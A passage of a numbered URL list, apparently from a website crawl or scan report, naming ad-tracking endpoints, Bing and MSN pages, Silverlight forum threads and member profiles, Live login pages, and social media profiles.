17.17. http://photobucket.com/$|zone.redacted|xbox.com|www.aol.com/$|http:/Webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

17.18. https://secure.opinionlab.com/ccc01/comment_card.asp

17.19. https://secure.opinionlab.com/ccc01/o.asp

17.20. https://secure.opinionlab.com/ccc01/o.asp

17.21. http://t.mookie1.com/t/v1/imp

17.22. http://travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

17.23. http://trueslant.com/milesobrien/

17.24. http://twitter.com/

17.25. http://twitter.com/$1

17.26. http://twitter.com/HelenASPopkin

17.27. http://twitter.com/MichaelWann

17.28. http://twitter.com/home

17.29. http://twitter.com/status/user_timeline/

17.30. http://twitter.com/windabenedetti

17.31. http://twitter.com/wjrothman

17.32. https://twitter.com/ToddKenreck

17.33. http://www.amazon.com/gp/product/0470650923

17.34. http://www.amazon.com/gp/product/0672333368

17.35. http://www.amazon.com/gp/product/0981511821

17.36. http://www.amazon.com/gp/product/184968006X

17.37. http://www.amazon.com/gp/product/1935182374

17.38. http://www.bing.com/shopping/content/search

17.39. http://www.bing.com/travel/

17.40. http://www.bing.com/travel/content/search

17.41. http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do

17.42. http://www.bing.com/travel/deals/last-minute-flight-deals.do

17.43. http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

17.44. http://www.bing.com/travel/hotels

17.45. http://www.dailygrail.com/

17.46. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/

17.47. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

17.48. http://www.kanoodle.com/

17.49. http://www.kanoodle.com/ajax/search_spy_data.html

17.50. http://www.kanoodle.com/ajax/search_spy_data_today.html

17.51. http://www.kanoodle.com/search_spy.html

17.52. http://www.linkedin.com/cws/share-count

17.53. http://www.msdn.com/

17.54. https://www.msnfeedback.com/perseus/se.ashx

17.55. http://www.opensource.org/licenses/gpl-license.php

17.56. http://www.opensource.org/licenses/mit-license.php

17.57. http://www.popsci.com/

17.58. http://www.sciencenews.org/

17.59. http://www.scientificamerican.com/blog/observations/

17.60. http://www.scientificamerican.com/errors/404.cfm

17.61. http://www.tigerdirect.com/applications/SearchTools/item-details.asp

17.62. http://www.unica.com/

17.63. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

17.64. http://www.zacks.com/

17.65. http://ad.doubleclick.net/ad/N3973.MSN/B4412732.227

17.66. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

17.67. http://ad.doubleclick.net/click

17.68. http://ad.doubleclick.net/clk

17.69. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/353.23.js.120x30/**

17.70. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/353.516.js.120x30/**

17.71. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

17.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/1209024888

17.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308

17.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/36374631

17.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/708002109

17.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

17.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

17.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**

17.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

17.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

17.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

17.82. http://ad.yieldmanager.com/pixel

17.83. http://add.my.yahoo.com/rss

17.84. http://ads.asp.net/a.aspx

17.85. http://ads.neudesicmediagroup.com/ads/charts_1110_728x90.gif

17.86. http://ads.revsci.net/adserver/ako

17.87. http://alex-johnson.newsvine.com/

17.88. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php

17.89. http://amch.questionmarket.com/adsc/d852149/4/40142779/decide.php

17.90. http://api.bit.ly/shorten

17.91. http://ar.voicefive.com/b/wc_beacon.pli

17.92. http://ar.voicefive.com/bmx3/broker.pli

17.93. http://articles.redacted/news/news.aspx

17.94. http://athima-chansanchai.newsvine.com/

17.95. http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607

17.96. http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607

17.97. http://atl.whitepages.com/AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

17.98. http://atl.whitepages.com/LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

17.99. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

17.100. http://b.scorecardresearch.com/b

17.101. http://b.scorecardresearch.com/r

17.102. http://b.voicefive.com/b

17.103. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

17.104. http://bit.ly/javascript-api.js

17.105. http://blogs.msdn.com/b/delay/archive/2011/01/27/sudo-localize-amp-amp-make-me-a-sandwich-free-pseudolocalizer-class-makes-it-easy-for-anyone-to-identify-potential-localization-issues-in-net-applications.aspx

17.106. http://blogs.silverlight.net/ScriptResource.axd

17.107. http://blogs.silverlight.net/WebResource.axd

17.108. http://blogs.silverlight.net/showcasehosted/

17.109. http://blogs.silverlight.net/showcasehosted/default.aspx

17.110. http://blogs.silverlight.net/showcasehosted/resources/services/BasicService.svc/GetAdvertisements

17.111. http://blogs.silverlight.net/showcasehosted/resources/services/BasicService.svc/GetCountries

17.112. http://blogs.silverlight.net/showcasehosted/resources/services/BasicService.svc/GetDemos

17.113. http://bonniercorp.122.2o7.net/b/ss/timepopsci/1/H.14/s78723546345718

17.114. http://boyle.newsvine.com/

17.115. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.116. http://c.redcated/c.gif

17.117. http://c.bing.com/c.gif

17.118. http://c.redacted/c.gif

17.119. http://c.statcounter.com/t.php

17.120. http://calendar.live.com/calendar/calendar.aspx

17.121. http://careers.redacted/

17.122. http://citi.bridgetrack.com/event/

17.123. http://clk.redcated/APM/go/139941180/direct

17.124. http://clk.redcated/APM/go/148848786/direct

17.125. http://clk.redcated/BEL/go/262582811/direct

17.126. http://clk.redcated/CNT/go/286609711/direct

17.127. http://clk.redcated/CNT/go/287065754/direct

17.128. http://clk.redcated/CNT/go/299297287/direct

17.129. http://clk.redcated/NFX/go/297941249/direct/01/

17.130. http://clk.redcated/ULA/go/296652509/direct

17.131. http://clk.redcated/go/286026710/direct

17.132. http://clk.redcated/go/286609711/direct

17.133. http://clk.redcated/go/287065754/direct

17.134. http://clk.redcated/go/296652509/direct

17.135. http://clk.redcated/goiframe/184054348/262582811/direct/01

17.136. http://clk.redcated/goiframe/199711109/299297287/direct

17.137. http://context3.kanoodle.com/cgi-bin/context.cgi

17.138. http://conveu.admailtiser.com/st

17.139. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js

17.140. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.141. http://deals.redacted/

17.142. http://dg.specificclick.net/

17.143. http://digitalnature.ro/

17.144. http://digitalnature.ro/projects/fusion

17.145. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23

17.146. http://domdex.com/f

17.147. http://earthsky.org/

17.148. http://editorial.autos.redacted/article.aspx

17.149. http://editorial.autos.redacted/articles/default.aspx

17.150. http://editorial.autos.redacted/blogs/autosblog.aspx

17.151. http://editorial.autos.redacted/media/default.aspx

17.152. http://editorial.autos.redacted/media/video/default.aspx

17.153. http://editorial.autos.redacted/new-cars/default.aspx

17.154. http://editorial.autos.redacted/slideshow.aspx

17.155. http://editorial.autos.redacted/used-cars/default.aspx

17.156. http://engine2.adzerk.net/z/8277/adzerk1_2_4_43,adzerk2_2_17_45

17.157. http://engine2.adzerk.net/z/8277/adzerk2_2_17_45

17.158. http://entertainment.redacted/

17.159. http://entertainment.redacted/news/

17.160. http://entertainment.redacted/video/

17.161. http://expression.microsoft.com/en-us/cc136530.aspx

17.162. http://forums.silverlight.net/

17.163. http://forums.silverlight.net/default.aspx

17.164. http://forums.silverlight.net/forums/13.aspx

17.165. http://forums.silverlight.net/forums/14.aspx

17.166. http://forums.silverlight.net/forums/15.aspx

17.167. http://forums.silverlight.net/forums/16.aspx

17.168. http://forums.silverlight.net/forums/17.aspx

17.169. http://forums.silverlight.net/forums/18.aspx

17.170. http://forums.silverlight.net/forums/19.aspx

17.171. http://forums.silverlight.net/forums/20.aspx

17.172. http://forums.silverlight.net/forums/21.aspx

17.173. http://forums.silverlight.net/forums/25.aspx

17.174. http://forums.silverlight.net/forums/28.aspx

17.175. http://forums.silverlight.net/forums/35.aspx

17.176. http://forums.silverlight.net/forums/46.aspx

17.177. http://forums.silverlight.net/forums/51.aspx

17.178. http://forums.silverlight.net/forums/52.aspx

17.179. http://forums.silverlight.net/forums/53.aspx

17.180. http://forums.silverlight.net/forums/56.aspx

17.181. http://forums.silverlight.net/forums/59.aspx

17.182. http://forums.silverlight.net/forums/63.aspx

17.183. http://forums.silverlight.net/forums/64.aspx

17.184. http://forums.silverlight.net/forums/65.aspx

17.185. http://forums.silverlight.net/forums/66.aspx

17.186. http://forums.silverlight.net/forums/67.aspx

17.187. http://forums.silverlight.net/forums/68.aspx

17.188. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx

17.189. http://forums.silverlight.net/forums/p/217026/518297.aspx

17.190. http://forums.silverlight.net/forums/p/217498/518305.aspx

17.191. http://forums.silverlight.net/forums/p/217562/518302.aspx

17.192. http://forums.silverlight.net/forums/p/217667/518301.aspx

17.193. http://forums.silverlight.net/forums/p/217709/518306.aspx

17.194. http://forums.silverlight.net/forums/p/217710/518307.aspx

17.195. http://forums.silverlight.net/forums/p/217719/518310.aspx

17.196. http://forums.silverlight.net/forums/p/217724/518300.aspx

17.197. http://forums.silverlight.net/forums/p/217726/518308.aspx

17.198. http://forums.silverlight.net/forums/p/217727/518309.aspx

17.199. http://forums.silverlight.net/forums/t/217026.aspx

17.200. http://forums.silverlight.net/forums/t/217498.aspx

17.201. http://forums.silverlight.net/forums/t/217562.aspx

17.202. http://forums.silverlight.net/forums/t/217667.aspx

17.203. http://forums.silverlight.net/forums/t/217709.aspx

17.204. http://forums.silverlight.net/forums/t/217710.aspx

17.205. http://forums.silverlight.net/forums/t/217719.aspx

17.206. http://forums.silverlight.net/forums/t/217724.aspx

17.207. http://forums.silverlight.net/forums/t/217726.aspx

17.208. http://forums.silverlight.net/forums/t/217727.aspx

17.209. http://forums.silverlight.net/forums/thread/396640.aspx

17.210. http://forums.silverlight.net/forums/topicsactive.aspx

17.211. http://forums.silverlight.net/forums/viewall.aspx

17.212. http://forums.silverlight.net/members/BradleyGZ.aspx

17.213. http://forums.silverlight.net/members/ColinBlair.aspx

17.214. http://forums.silverlight.net/members/Daoping-Liu-_2D00_-MSFT.aspx

17.215. http://forums.silverlight.net/members/Datikos.aspx

17.216. http://forums.silverlight.net/members/David-Anson.aspx

17.217. http://forums.silverlight.net/members/Fredrik_5F00_.aspx

17.218. http://forums.silverlight.net/members/Furukoo.aspx

17.219. http://forums.silverlight.net/members/GFR_5F00_2009.aspx

17.220. http://forums.silverlight.net/members/Gaz3ll.aspx

17.221. http://forums.silverlight.net/members/Jonathan-Shen-_1320_-MSFT.aspx

17.222. http://forums.silverlight.net/members/MF_5F00_MiEK.aspx

17.223. http://forums.silverlight.net/members/MisterGoodcat.aspx

17.224. http://forums.silverlight.net/members/Shi-Ding-_2D00_-MSFT.aspx

17.225. http://forums.silverlight.net/members/Skyrunner.aspx

17.226. http://forums.silverlight.net/members/TimeBandit.aspx

17.227. http://forums.silverlight.net/members/Xpert360.aspx

17.228. http://forums.silverlight.net/members/_2D002D00_Will_2D002D00_.aspx

17.229. http://forums.silverlight.net/members/abeaulieu.aspx

17.230. http://forums.silverlight.net/members/alt_5F00_fo.aspx

17.231. http://forums.silverlight.net/members/billb08.aspx

17.232. http://forums.silverlight.net/members/bradsevertson.aspx

17.233. http://forums.silverlight.net/members/brucemcmillan.aspx

17.234. http://forums.silverlight.net/members/clintong.aspx

17.235. http://forums.silverlight.net/members/dhook.aspx

17.236. http://forums.silverlight.net/members/emil.aspx

17.237. http://forums.silverlight.net/members/gary-frank.aspx

17.238. http://forums.silverlight.net/members/houmie.aspx

17.239. http://forums.silverlight.net/members/ilektrik.aspx

17.240. http://forums.silverlight.net/members/jamlew.aspx

17.241. http://forums.silverlight.net/members/jerry-weng-_2D00_-msft.aspx

17.242. http://forums.silverlight.net/members/jesseliberty.aspx

17.243. http://forums.silverlight.net/members/jimpoteet.aspx

17.244. http://forums.silverlight.net/members/jperl.aspx

17.245. http://forums.silverlight.net/members/khalzoro.aspx

17.246. http://forums.silverlight.net/members/kylemc.aspx

17.247. http://forums.silverlight.net/members/lein4d.aspx

17.248. http://forums.silverlight.net/members/malignate.aspx

17.249. http://forums.silverlight.net/members/mbanavige.aspx

17.250. http://forums.silverlight.net/members/pitchai.be.aspx

17.251. http://forums.silverlight.net/members/rightcoder.aspx

17.252. http://forums.silverlight.net/members/samw.aspx

17.253. http://forums.silverlight.net/members/sladapter.aspx

17.254. http://forums.silverlight.net/members/snelldl.aspx

17.255. http://forums.silverlight.net/members/sniles.aspx

17.256. http://forums.silverlight.net/members/swo.aspx

17.257. http://forums.silverlight.net/members/syed-amjad.aspx

17.258. http://forums.silverlight.net/members/tanmoy.r.aspx

17.259. http://forums.silverlight.net/members/thaicarrot.aspx

17.260. http://forums.silverlight.net/members/vikasamin.aspx

17.261. http://forums.silverlight.net/members/yifung.aspx

17.262. http://forums.silverlight.net/search/

17.263. http://forums.silverlight.net/user/profile.aspx

17.264. http://forums.silverlight.net/user/viewonline.aspx

17.265. http://health.redacted/

17.266. http://helenaspopkin.newsvine.com/

17.267. http://ingame.newsvine.com/

17.268. http://js.revsci.net/gateway/gw.js

17.269. http://latino.redacted/

17.270. http://leadback.advertising.com/adcedge/lb

17.271. http://lifestyle.redacted/

17.272. http://lifestyle.redacted/relationships/

17.273. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx

17.274. http://lifestyle.redacted/your-home/

17.275. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx

17.276. http://lifestyle.redacted/your-life/family-parenting/article.aspx

17.277. http://lifestyle.redacted/your-life/new-year-new-you/video.aspx

17.278. http://lifestyle.redacted/your-life/your-money-today/article.aspx

17.279. http://lifestyle.redacted/your-life/your-money-today/video.aspx

17.280. http://lifestyle.redacted/your-look/

17.281. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

17.282. http://lifestyle.redacted/your-look/video/

17.283. http://live.newsvine.com/

17.284. http://local.redacted/

17.285. http://local.redacted/events.aspx

17.286. http://local.redacted/gas-traffic.aspx

17.287. http://local.redacted/hourly.aspx

17.288. http://local.redacted/movies-events.aspx

17.289. http://local.redacted/news.aspx

17.290. http://local.redacted/restaurants.aspx

17.291. http://local.redacted/sports.aspx

17.292. http://local.redacted/ten-day.aspx

17.293. http://local.redacted/weather.aspx

17.294. http://login.live.com/login.srf

17.295. https://login.live.com/login.srf

17.296. https://login.live.com/pp900/

17.297. https://login.live.com/ppsecure/post.srf

17.298. https://login.live.com/ppsecure/secure.srf

17.299. https://login.live.com/resetpw.srf

17.300. https://login.silverlight.net/login/createuser.aspx

17.301. https://login.silverlight.net/login/signin.aspx

17.302. http://m.webtrends.com/dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif

17.303. http://media.fastclick.net/w/tre

17.304. http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878

17.305. http://michaelwann.newsvine.com/

17.306. http://money.redacted/auto-insurance/article.aspx

17.307. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

17.308. http://money.redacted/currency/currency-clash-dollar-vs-euro-smartmoney.aspx

17.309. http://money.redacted/identity-theft/default-dyn.aspx

17.310. http://money.redacted/market-news/post.aspx

17.311. http://money.redacted/mutual-fund/default-dyn.aspx

17.312. http://money.redacted/saving-money/50-30-20-budget.aspx

17.313. http://redacted/

17.314. http://redacted/detail/stock_quote

17.315. http://redacted/inc/Attributions.asp

17.316. http://redacted/personal-finance/

17.317. http://movies.redacted/

17.318. http://movies.redacted/academy-awards/snubs/

17.319. http://movies.redacted/jason-statham/photo-gallery/feature/

17.320. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/

17.321. http://movies.redacted/new-on-dvd/movies/

17.322. http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

17.323. http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

17.324. http://movies.redacted/showtimes/showtimes.aspx

17.325. http://movies.redacted/the-rundown/the-guard/story_5/

17.326. http://msdn.microsoft.com/

17.327. http://msdn.microsoft.com/en-us/library/cc838158(VS.95

17.328. http://msdn.microsoft.com/en-us/library/cc838158(VS.95).aspx

17.329. http://msdn.microsoft.com/en-us/library/ff637515(VS.92

17.330. http://msdn.microsoft.com/en-us/library/ff637515(VS.92).aspx

17.331. http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx

17.332. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845

17.333. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724

17.334. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812

17.335. https://msnia.login.live.com/ppsecure/post.srf

17.336. http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0}

17.337. http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}

17.338. http://music.redacted/

17.339. http://my.live.com/

17.340. http://my.redacted/

17.341. http://oasc03049.popsci.com/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

17.342. http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

17.343. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx

17.344. http://onlinehelp.microsoft.com/en-us/msn/money.aspx

17.345. http://onlinehelp.microsoft.com/en-us/msn/qwlinfo.aspx

17.346. http://onlinehelp.microsoft.com/en-us/msn/qwlnotyours.aspx

17.347. http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx

17.348. http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js

17.349. http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js

17.350. http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js

17.351. http://pix04.revsci.net/D08734/a1/0/0/0.gif

17.352. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

17.353. http://ptsd.eyewonder.com/ewr

17.354. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

17.355. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

17.356. http://r1-ads.ace.advertising.com/site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F

17.357. http://realestate.redacted/

17.358. http://realestate.redacted/OmRedir.aspx

17.359. http://realestate.redacted/article.aspx

17.360. http://realestate.redacted/slideshow.aspx

17.361. http://redtape.newsvine.com/

17.362. http://s18.sitemeter.com/js/counter.asp

17.363. https://sb.voicefive.com/b

17.364. http://search.redacted/

17.365. https://security.live.com/LoginStage.aspx

17.366. https://security.live.com/LoginStage.aspx

17.367. http://seedmagazine.com/

17.368. http://seg.admailtiser.com/st

17.369. https://signup.live.com/signup.aspx

17.370. http://social.entertainment.redacted/bloglist.aspx

17.371. http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx

17.372. http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx

17.373. http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx

17.374. http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads

17.375. http://specials.redacted/

17.376. http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

17.377. http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

17.378. http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx

17.379. http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx

17.380. http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx

17.381. http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx

17.382. http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx

17.383. http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

17.384. http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

17.385. http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx

17.386. http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx

17.387. http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx

17.388. http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx

17.389. http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

17.390. http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx

17.391. http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

17.392. http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx

17.393. http://specials.redacted/IEIncreaseFont_preview.aspx

17.394. http://specials.redacted/alphabet.aspx

17.395. http://statse.webtrendslive.com/dcszbiart00000oiar2s6w5ud_4y9j/dcs.gif

17.396. http://suzanne-choney.newsvine.com/

17.397. http://team.silverlight.net/tips-and-training/silverlight-tv-59-what-goes-into-baking-silverlight/

17.398. http://technolog2.newsvine.com/

17.399. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt

17.400. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

17.401. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl/

17.402. http://toddkenreck.newsvine.com/

17.403. http://top.newsvine.com/

17.404. http://top.newsvine.com/users

17.405. http://tv.redacted/

17.406. http://tv.redacted/tv/article.aspx

17.407. http://us.mc1125.mail.yahoo.com/mc/compose

17.408. http://redcated/CNT/iview/299297287/direct

17.409. http://wbenedetti.newsvine.com/

17.410. http://webmail.aol.com/28200/aim/en-us/mail/compose-message.aspx

17.411. http://www.bing.com/

17.412. http://www.bing.com/challenge

17.413. http://www.bing.com/events/search

17.414. http://www.bing.com/fd/ls/GLinkPing.aspx

17.415. http://www.bing.com/fd/ls/l

17.416. http://www.bing.com/finance/stockscreener

17.417. http://www.bing.com/images/results.aspx

17.418. http://www.bing.com/local/ypdefault.aspx

17.419. http://www.bing.com/maps/

17.420. http://www.bing.com/maps/default.aspx

17.421. http://www.bing.com/maps/explore/

17.422. http://www.bing.com/msnhomepagehistory.aspx

17.423. http://www.bing.com/news/results.aspx

17.424. http://www.bing.com/news/search

17.425. http://www.bing.com/news/search

17.426. http://www.bing.com/results.aspx

17.427. http://www.bing.com/sck

17.428. http://www.bing.com/search

17.429. http://www.bing.com/search

17.430. http://www.bing.com/search/

17.431. http://www.bing.com/shopping

17.432. http://www.bing.com/shopping/bird-feeders/search

17.433. http://www.bing.com/shopping/healthy-cooking/r/151

17.434. http://www.bing.com/shopping/makeup/c/4259

17.435. http://www.bing.com/shopping/search

17.436. http://www.bing.com/shopping/swimwear/c/4503

17.437. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144

17.438. http://www.bing.com/videos/browse

17.439. http://www.bing.com/videos/results.aspx

17.440. http://www.bing.com/videos/results.aspx

17.441. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

17.442. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

17.443. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

17.444. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

17.445. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

17.446. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt

17.447. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

17.448. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

17.449. http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy

17.450. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2

17.451. http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

17.452. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

17.453. http://www.co2stats.com/prowidget.php

17.454. http://www.collectspace.com/

17.455. http://www.facebook.com/2008/fbml

17.456. http://www.facebook.com/HelenASPopkin

17.457. http://www.facebook.com/sharer.php

17.458. http://www.facebook.com/todd.kenreck

17.459. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml

17.460. http://www.hoovers.com/favicon.ico

17.461. http://www.interactivedata-rts.com/

17.462. http://www.live.com/

17.463. http://www.microsoft.com/web/gallery/install.aspx

17.464. http://www.morningstar.com/

17.465. http://www.redacted/

17.466. http://www.msnbc.redacted/

17.467. http://www.msnbc.redacted/id/8004316/

